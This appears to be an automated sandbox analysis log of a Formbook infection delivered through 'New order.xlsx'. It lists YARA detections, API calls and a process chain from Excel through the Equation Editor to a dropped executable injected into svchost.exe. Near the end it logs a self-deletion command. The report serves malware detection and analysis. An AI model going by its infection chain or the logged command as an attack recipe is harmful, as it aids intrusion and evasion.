        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01321890
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132C3BD
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132A184
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132B3F1
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01329C12
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_013296A0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01327E88
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_00110A56
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E819
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00401030
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E0B6
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00402D89
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00402D90
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00409E5B
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00409E60
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041DE2C
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E79E
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00402FB0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132A184
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01321890
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132C3BD
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132B3F1
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01329C12
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_013296A0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01327E88
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4E0C6
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A7D005
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A53040
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A6905A
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4E2E9
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF1238
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF63BF
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4F3CF
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A763DB
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A52305
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A9A37B
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A57353
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A85485
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A61489
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A8D47D
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A6C5F0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5351F
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A96540
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A54680
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5E6C1
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF2622
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A9A634
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5C7BC
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AD579A
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A857C3
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AEF8EE
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A7286D
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5C85C
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A529B2
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF098E
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A669FE
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AD5955
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00B03A83
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AFCBA4
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0072D06D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B3040
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C905A
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006DD005
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006AE0C6
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00751238
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006AE2E9
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006FA37B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B7353
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B2305
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006AF3CF
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006D63DB
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_007563BF
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006ED47D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073443E
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C1489
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E5485
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006F6540
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B351F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006CC5F0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00752622
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006FA634
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BE6C1
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B4680
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E57C3
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BC7BC
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073579A
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006D286D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BC85C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0074F8EE
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00735955
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073394B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C69FE
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B29B2
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075098E
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00763A83
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006D7B00
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073DBDA
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075CBA4
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BCD5B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E0D3B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0074FDDD
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006CEE4C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E2E2F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006DDF7C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C0F3F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00722FDC
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0074CFB1
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E0B6
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E79E
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E819
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00102D90
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00102D89
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00109E5B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00109E60
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00102FB0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00A4DF5C appears 89 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00A9373B appears 176 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00A93F92 appears 71 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00ABF970 appears 56 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 01324599 appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 01322400 appears 54 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006AE2A8 appears 38 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0071F970 appears 84 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006ADF5C appears 121 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006F373B appears 245 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006F3F92 appears 132 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A360 NtCreateFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A410 NtReadFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A490 NtClose,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A35A NtCreateFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A40A NtReadFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A53A NtAllocateVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A400C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A40078 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A410D0 NtOpenProcessToken,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A40060 NtQuerySection,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A401D4 NtSetValueKey,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4010C NtOpenDirectoryObject,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A41148 NtOpenThread,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A407AC NtCreateMutant,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F8CC NtWaitForSingleObject,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A41930 NtSetContextThread,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F938 NtWriteFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FAB8 NtQueryValueKey,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FA20 NtQueryInformationFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A00C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A07AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FAB8 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FB50 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0060 NtQuerySection,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0078 NtResumeThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0048 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A10D0 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A1148 NtOpenThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A010C NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A01D4 NtSetValueKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F8CC NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F938 NtWriteFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A1930 NtSetContextThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FA20 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FBE8 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC48 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0C40 NtGetContextThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC30 NtOpenProcess,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC90 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FD5C NtEnumerateKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A1D80 NtSuspendThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FE24 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FEA0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FFFC NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A360 NtCreateFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A410 NtReadFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A490 NtClose,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A540 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A35A NtCreateFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A40A NtReadFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A53A NtAllocateVirtualMemory,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77740000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77740000 page execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 77740000 page execute and read and write
        Source: New order.xlsxVirustotal: Detection: 40%
        Source: New order.xlsxReversingLabs: Detection: 34%
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$New order.xlsx
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63E0.tmp
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/16@2/2
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
